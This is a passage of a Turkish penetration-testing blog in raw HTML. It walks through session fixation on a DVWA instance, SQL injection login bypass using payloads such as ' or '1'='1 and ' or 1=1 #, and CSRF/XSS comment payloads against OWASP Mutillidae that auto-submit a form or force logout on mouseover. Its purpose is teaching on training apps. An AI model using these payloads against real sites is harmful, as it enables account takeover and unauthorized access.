<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Aşama-4:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Saldırgan saldıracağı site için bir Session Id değeri üretir.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQjj-I3Ro0FAUi2F-AjczosNdOTs9wJTBYPZDqRe-aS0iJ1aukeRRvURYtIQg7H7boxyNBeJOyIHy2a9TvW8rXpaz6WeeOxIs3HUbUZwCYHaY_d-oTQCNkE9GI4SHmYwqc6u6m2DYT4VY/s1600/s5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQjj-I3Ro0FAUi2F-AjczosNdOTs9wJTBYPZDqRe-aS0iJ1aukeRRvURYtIQg7H7boxyNBeJOyIHy2a9TvW8rXpaz6WeeOxIs3HUbUZwCYHaY_d-oTQCNkE9GI4SHmYwqc6u6m2DYT4VY/s1600/s5.png" height="216" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong style="color: #333333;">Aşama-5: </strong><span style="color: #333333;">Saldırgan mail vb. yollarla bu Session Id değerinin kurbana yollar.Kurban aşağıdaki url adresini içinde barındıran </span><span style="color: red;">(<a data-mce-href="http://goo.gl/J9G6cO" href="http://goo.gl/J9G6cO">http://goo.gl/J9G6cO</a>)</span><span style="color: #333333;"> linki tıklayınca saldırganın saldırı için hazırladığı Session id (</span><strong style="color: #333333;">PHPSESSID=nhpprj9s9dv9gvlmdkebiitkm3</strong><span style="color: #333333;">) değerini sunucuya kabul ettirmiş oldu.</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; line-height: 19px;">
<span style="color: red; font-size: x-small;"><a data-mce-href="http://goo.gl/J9G6cO%20----> http://fbhportal.com/dvwa/vulnerabilities/sqli/?id=1&PHPSESSID=nhpprj9s9dv9gvlmdkebiitkm3" href="http://goo.gl/J9G6cO%20----%3E%20http://fbhportal.com/dvwa/vulnerabilities/sqli/?id=1&PHPSESSID=nhpprj9s9dv9gvlmdkebiitkm3">http://goo.gl/J9G6cO ----> http://fbhportal.com/dvwa/vulnerabilities/sqli/?id=1&PHPSESSID=nhpprj9s9dv9gvlmdkebiitkm3</a></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT_8y9F2HteqbkgJbBMpE6Aamhf-Q8ZxDVk3C_Pioixu1pzRlkDI7g_0DIl84Qe8d28LErixjfrefGhxQ8hioKoA17ExBTmJLbg7qkOcwLZyA9Q0219soubsVzYW-uvLhT80uSQw9ugLE/s1600/s6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT_8y9F2HteqbkgJbBMpE6Aamhf-Q8ZxDVk3C_Pioixu1pzRlkDI7g_0DIl84Qe8d28LErixjfrefGhxQ8hioKoA17ExBTmJLbg7qkOcwLZyA9Q0219soubsVzYW-uvLhT80uSQw9ugLE/s1600/s6.png" height="43" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Aşama-6:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> Kurban sitede dolaşırken session id değeri aşağıdaki gibidir.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCx03gXwcF3ejKmUhlDeFDqvpOdnhk75u63bWBYBjz86eZLEQ1h3dMSPFecT9T6hvGEJuzFeAbvo6i4a2mZ5lZ48mMlmn2ctvgmRRlIUaXQHC4Ez4Nhx3yIoZ_b9fzD3_QdbB8oxrJ4y0/s1600/s7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCx03gXwcF3ejKmUhlDeFDqvpOdnhk75u63bWBYBjz86eZLEQ1h3dMSPFecT9T6hvGEJuzFeAbvo6i4a2mZ5lZ48mMlmn2ctvgmRRlIUaXQHC4Ez4Nhx3yIoZ_b9fzD3_QdbB8oxrJ4y0/s1600/s7.png" height="35" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px; text-align: start;"><br /></strong></div>
<div class="separator" style="clear: both; text-align: center;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px; text-align: start;"><br /></strong></div>
<div class="separator" style="clear: both; text-align: left;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Aşama-7:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> Saldırgan kurbana yolladığı linkteki adresi girer ve siteye login olmadan işlem yapar.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px; text-align: start;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJvMW5bDGzxwlvoJeY4V3CSCfSmY9lz_83rAs53KgAOf8tIxmK04mFJIpnAbnzDvM4sPUdoLNSI27MBVzCOhEayfygIKSt6FYiOcr8TtZhxjEuMjWC7DD2ZDP2RUOFvhK5NaeinySJyak/s1600/sessionfix_7-1024x160.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJvMW5bDGzxwlvoJeY4V3CSCfSmY9lz_83rAs53KgAOf8tIxmK04mFJIpnAbnzDvM4sPUdoLNSI27MBVzCOhEayfygIKSt6FYiOcr8TtZhxjEuMjWC7DD2ZDP2RUOFvhK5NaeinySJyak/s1600/sessionfix_7-1024x160.png" height="62" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px; text-align: start;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px; text-align: start;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Aşama-8:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> Saldırgan artık kurbanın bilgilerini elde etti.Saldırı başarılı oldu.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOesTVRCsmFjSaFDajKVMZzGm1AMeafM3Vr_opKPnt4TROBeqV77j9KcW5XmsFFxHTi1W1iO9IeJzEp4TkTvwTUiq9KVS_uwOEWspueLqli-iY4y66IP_-w7maiuH1smbZ8mkrZfrHsEY/s1600/sessionfix_8-1024x620.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOesTVRCsmFjSaFDajKVMZzGm1AMeafM3Vr_opKPnt4TROBeqV77j9KcW5XmsFFxHTi1W1iO9IeJzEp4TkTvwTUiq9KVS_uwOEWspueLqli-iY4y66IP_-w7maiuH1smbZ8mkrZfrHsEY/s1600/sessionfix_8-1024x620.png" height="241" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Çözüm olarak söyleyebileceğim ise; daha az session kullanımı,kullanılan session değerlerinin şifrelenmiş olması,session değerlerinin birbirleriyle bağlantılarının kurulamayacak şekilde dizaynı ve session yaşam süreleri iyi yapılandırılırsa bu tip ataklardan daha az etkilenilir.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-30754114976742410612014-09-30T09:39:00.002+03:002014-10-24T14:34:34.215+03:00Sql Injection ile Login-Authentication Alanının Bypass Edilmesi<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Sql Injection ile Login-Authentication alanının Bypass edilmesi, dinamik sayfalarda (veritabanı ile kullanıcıların etkileşimli olmasıyla) veritabanı ile etkileşimi olan alanların sorgularında açıklık bulunması ile zafiyetin istismar edilmesi oluşan saldırı yöntemidir.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Üye olduğumuz web sayfalarına login alanına kayıtlı username ve password bilgileri ile giriş yaparız. Peki kayıtlı olduğumuza dair sorgulama yapan kodların veritabanı kodlarında açıklık varsa bunu üye olmadan kullanabilir miyiz.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhanVOaDw-7Unqy2BPKZcMxjuqVFED8sn0nCuoODbr135AvUTrTlQMfgI4gGBAaHOKQoX6I7ab6-J3B4_Lh_AIgufrHtCxyTclRINvQA-bFTwk9qGojWqhyphenhypheni7TVv7heNYe_MZ1SZ4CcqkU/s1600/sql-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhanVOaDw-7Unqy2BPKZcMxjuqVFED8sn0nCuoODbr135AvUTrTlQMfgI4gGBAaHOKQoX6I7ab6-J3B4_Lh_AIgufrHtCxyTclRINvQA-bFTwk9qGojWqhyphenhypheni7TVv7heNYe_MZ1SZ4CcqkU/s1600/sql-1.png" height="200" width="400" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
-> <em><b>Select * from uyeler where username=<span data-mce-style="color: #ff0000;" style="color: red;">' '</span> and password=<span data-mce-style="color: #ff0000;" style="color: red;">' '</span> ;</b></em> bu kod yapısını nasıl istismar edebiliriz?</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
<a name='more'></a><br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
-> <em><b>Select * from uyeler where username=<span data-mce-style="color: #ff0000;" style="color: red;">'</span>ali<span data-mce-style="color: #ff0000;" style="color: red;"> '</span> and password=<span data-mce-style="color: #ff0000;" style="color: red;">'</span>1234<span data-mce-style="color: #ff0000;" style="color: red;"> '</span></b></em> olsa kayıtlı sorguyu çeker ve üye ise giriş yaptırır.Peki username ve password bilgileri aşağıdaki gibi olursa</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
-> <b><em>username=boş</em> password=<em>or '1'='1</em> </b> şimdi bunları sql koduna aktaralım</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="color: #333333;">-> </span><b><em style="color: #333333;">Select * from uyeler where username=<span data-mce-style="color: #ff0000;" style="color: red;">' </span> <span data-mce-style="color: #ff0000;" style="color: red;">'</span> and password=</em><em><span data-mce-style="color: #ff0000;" style="color: red;">'</span><span style="color: #333333;"> </span><em><span style="color: #333333;">' </span><span style="color: #e69138;">or '1'='1</span></em><span data-mce-style="color: #ff0000;"><span style="color: #e69138;">'</span></span></em></b><span style="color: #333333;"> şeklinde sorguya dönüşüyor.</span></div>
<div style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="color: #333333;"><br /></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Dolayısıyla <em><b> Select * from uyeler where username=<span data-mce-style="color: #ff0000;" style="color: red;">' </span> <span data-mce-style="color: #ff0000;" style="color: red;">'</span> and password=</b></em><strong><em><span data-mce-style="color: #ff0000;" style="color: red;">'</span> ' <em>or '1'='1</em><span data-mce-style="color: #ff0000;" style="color: red;">' </span> </em> </strong>sorgusu ile <b>username</b> ve <b>password </b>değeri boş olan ama <b>1=1</b> (her zaman doğru olacağından) den dolayı tabloda sanki <b>username </b>değeri boş ve <b>password </b>değeri boş olan biri varmış gibi işlemi başarılı sayar ve web sitesine giriş yaptırır.Test edelim.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs1yjdlltYD-ew7R2XAAQvAIqj4_ERy3oTg8sTLjdqzXVd3mYumS2nD9mdMiTm_5fgsgzYzLeBTn7LK9XT4zMIjcJMAddOBVXU4r3Fn_OkgwW-bmAEVEGp6HkkM8eE3jCTU6MWIShD65E/s1600/sql-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs1yjdlltYD-ew7R2XAAQvAIqj4_ERy3oTg8sTLjdqzXVd3mYumS2nD9mdMiTm_5fgsgzYzLeBTn7LK9XT4zMIjcJMAddOBVXU4r3Fn_OkgwW-bmAEVEGp6HkkM8eE3jCTU6MWIShD65E/s1600/sql-2.png" height="337" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><b>username=www</b> ve <b>password=' or '1'='1 </b> değeri ile sisteme sorgu gönderdik. <b>or 1=1</b> değeri solundaki ve sağındaki değerleri otomatik olarak doğru yaptığından tablodaki ilk değeri sonuç olarak dönderiyor. İstersek username alanına </span><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><b>' or 1=1 #</b></span><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> değerini ekler ve <b>password</b> değerini ve sonrasını yorum satırı haline getirir yinede giriş yaparız.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi12V2FW9TAC5ZnEKvjMyUONb8uMp4UbgxlH5u1c0o6siduB4hjzDMxgwPNET6mbUzZ4-xfiYTDl8bYC4UmLSWpDODW5OkZnbgRqNYr_WcSZ9CcS7BC5akKxDLwGyWsQFJG2z08DlZF3SY/s1600/sql-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi12V2FW9TAC5ZnEKvjMyUONb8uMp4UbgxlH5u1c0o6siduB4hjzDMxgwPNET6mbUzZ4-xfiYTDl8bYC4UmLSWpDODW5OkZnbgRqNYr_WcSZ9CcS7BC5akKxDLwGyWsQFJG2z08DlZF3SY/s1600/sql-31.png" height="337" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Aşağıdaki resimde de görüldüğü gibi </span><em style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><strong><span data-mce-style="color: #ff0000;" style="color: red;">username=admin; uid=1; ve cookie</span></strong></em><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> değerleri doldurulmuş.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvddfUw_c6hZwQZNRcsVRtMGacQDVX8TKAaAyA4x6ixfA5PYOJPM5c3-RLxCA47mvnFyhxvmiM4FbmQ5cIe1H52gNB5GFNgHPETy3aa2uyZnHv07MSaY0ud9g_-A6-OTMwfz68dSoa1i0/s1600/sql-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvddfUw_c6hZwQZNRcsVRtMGacQDVX8TKAaAyA4x6ixfA5PYOJPM5c3-RLxCA47mvnFyhxvmiM4FbmQ5cIe1H52gNB5GFNgHPETy3aa2uyZnHv07MSaY0ud9g_-A6-OTMwfz68dSoa1i0/s1600/sql-41.png" height="230" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Aşağıdaki resimde giriş yapılan kişiyi görüyoruz</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6RA7wMJwqkGdMv_QC4lnQMcA7Um3eMPmQsyzdw4ouO3QjhSMw9KmezGhhZBVglJ-CN7FOLpsPJXx1I9la34wo-T17fG9KUOiF94yaAWIHowgNP_vVUkwNVOF2WZ1nuN_7gxzSltAmLEY/s1600/sql-5-1024x131.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6RA7wMJwqkGdMv_QC4lnQMcA7Um3eMPmQsyzdw4ouO3QjhSMw9KmezGhhZBVglJ-CN7FOLpsPJXx1I9la34wo-T17fG9KUOiF94yaAWIHowgNP_vVUkwNVOF2WZ1nuN_7gxzSltAmLEY/s1600/sql-5-1024x131.png" height="50" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-30098048751638269652014-09-30T09:31:00.000+03:002014-10-24T14:33:50.821+03:00Yorum Ekleme Alanına CSRF Saldırısı Gerçekleştirme<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Web uygulamalarında yorum alanlarını çok dikkatli kullandırtmak gerekiyor.Bu alanların girdileri ve çıktıları kontrol edilmeden işlem yaptırılırsa tehlikeli saldırılara maruz kalınabilinir.Bunun tipik örnekleri bu yorum alanlarının html destekli olarak kullanıcılara sunulmalarıdır. Html destekli alanlara CSRF-XSS saldırıları çok rahat gerçekleştirilir.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Biz bu makalede birkaç farklı CSRF saldırısı deneyeceğiz.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
İlk olarak belirli bir alanın üzerine gelindiğinde CSRF ile kayıt ekleme saldırısı.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Bu uygulamayı OWASP-Mutillidae uygulaması üzerinden gerçekleştireceğiz.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Zararlı Kodlar</strong></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code><br /></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code><form id="f" action="index.php?page=add-to-your-blog.php" method="post" enctype="application/x-www-form-urlencoded"></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code> <input type="hidden" name="csrf-token" value="best-guess"/></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code> <input type="hidden" name="blog_entry" value="Add this guy to the Wall of Sheep"/></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code> <input type="hidden" name="add-to-your-blog-php-submit-button" value="TESTING"/></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code></form></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code><i onmouseover="window.document.getElementById(\'f\').submit()">Dancing with the stars results</code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code></i></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Bu kodları uygulamada test edelim.<br />
<br />
<a name='more'></a><br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCuMeKHjeCnYSixtewQzfvycCI398yRXRo3Bum2x7nvwylAuyiVWZb0EjANOvZ0yl25kbHRA60n24OGMmIG8ekAXoX9-zc9zElAUNoyYMIB6Az7C-2mXrpq2463ERukLKqzdPP-jRwFdA/s1600/c1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCuMeKHjeCnYSixtewQzfvycCI398yRXRo3Bum2x7nvwylAuyiVWZb0EjANOvZ0yl25kbHRA60n24OGMmIG8ekAXoX9-zc9zElAUNoyYMIB6Az7C-2mXrpq2463ERukLKqzdPP-jRwFdA/s1600/c1.png" height="172" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
ikinci uygulamamızda yine mouseover( ) olayının tetiklenmesi durumunda session-oturum düşmesi gerçekleşir.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Zararlı Kod:</strong></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code><i onmouseover="window.document.location=\'http://localhost/mutillidae/index.php?do=logout\'"></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code>How to improve your Facebook status</code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code></i> </code></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbECnsutfsulIdEFvEgXT2dcsT18km2ZUdRQHO0nmULIAmaE2kquv68irxi-KoSPKOyQ5W0ZhZtuX48goqknA5BTpBpaI5dYx9bKpXCy638GjrzfrqWyWx3t6PThcx4f7pxbkFNGf_Jrc/s1600/c2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbECnsutfsulIdEFvEgXT2dcsT18km2ZUdRQHO0nmULIAmaE2kquv68irxi-KoSPKOyQ5W0ZhZtuX48goqknA5BTpBpaI5dYx9bKpXCy638GjrzfrqWyWx3t6PThcx4f7pxbkFNGf_Jrc/s1600/c2.png" height="275" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Üçüncü uygulamada javascript kodu ile satır eklenir sayfa yenilenir, sayfa yenilendiği sürece satır eklenir. Bu da bir nevi DOS saldırısı gibi sayfanın kullanılamaz hale getirilmesini sağlar.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaZkqdlaqhBZyHSpLxwU2pTAx146VG81AQmADVuybuJPRfDkXCcgqB-pdSZcdk73OrtzfDXNM7ySgX6_vMgKcCnxvt8aYrfHXTVVJhcWuwSvWabNJPPiQGnwElmloVSUIDKsbg4_utKLY/s1600/c4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaZkqdlaqhBZyHSpLxwU2pTAx146VG81AQmADVuybuJPRfDkXCcgqB-pdSZcdk73OrtzfDXNM7ySgX6_vMgKcCnxvt8aYrfHXTVVJhcWuwSvWabNJPPiQGnwElmloVSUIDKsbg4_utKLY/s1600/c4.png" height="218" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
